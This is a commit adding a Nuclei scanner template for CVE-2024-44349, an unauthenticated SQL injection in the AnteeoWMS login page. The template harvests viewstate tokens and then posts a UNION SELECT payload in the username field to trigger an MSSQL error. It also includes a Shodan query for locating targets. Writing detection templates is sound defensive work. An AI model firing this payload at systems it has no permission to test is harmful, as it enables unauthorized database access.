Merge pull request #10971 from projectdiscovery/CVE-2024-44349

Create CVE-2024-44349.yaml
2024-10-15 11:39:02 +04:00 · 2024-10-15 11:39:02 +04:00 · 888259e286
parent cf523091d8 b5dc99883c
commit 888259e286
1 changed files with 69 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-44349.yaml
+++ b/http/cves/2024/CVE-2024-44349.yaml
@ -0,0 +1,69 @@
+id: CVE-2024-44349
+
+info:
+  name: AnteeoWMS < v4.7.34 - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
+  reference:
+    - https://blog.cybergon.com/posts/cve-2024-44349/
+    - http://nvd.nist.gov/vuln/detail/CVE-2024-44349
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-44349
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"ANTEEO"
+  tags: cve,cve2024,sqli,anteeowms
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /default.aspx HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: viewstate
+        internal: true
+        group: 1
+        regex:
+          - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'
+
+      - type: regex
+        part: body
+        name: viewstategen
+        internal: true
+        group: 1
+        regex:
+          - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'
+
+      - type: regex
+        part: body
+        name: eventval
+        internal: true
+        group: 1
+        regex:
+          - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'
+
+  - raw:
+      - |
+        POST /default.aspx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server'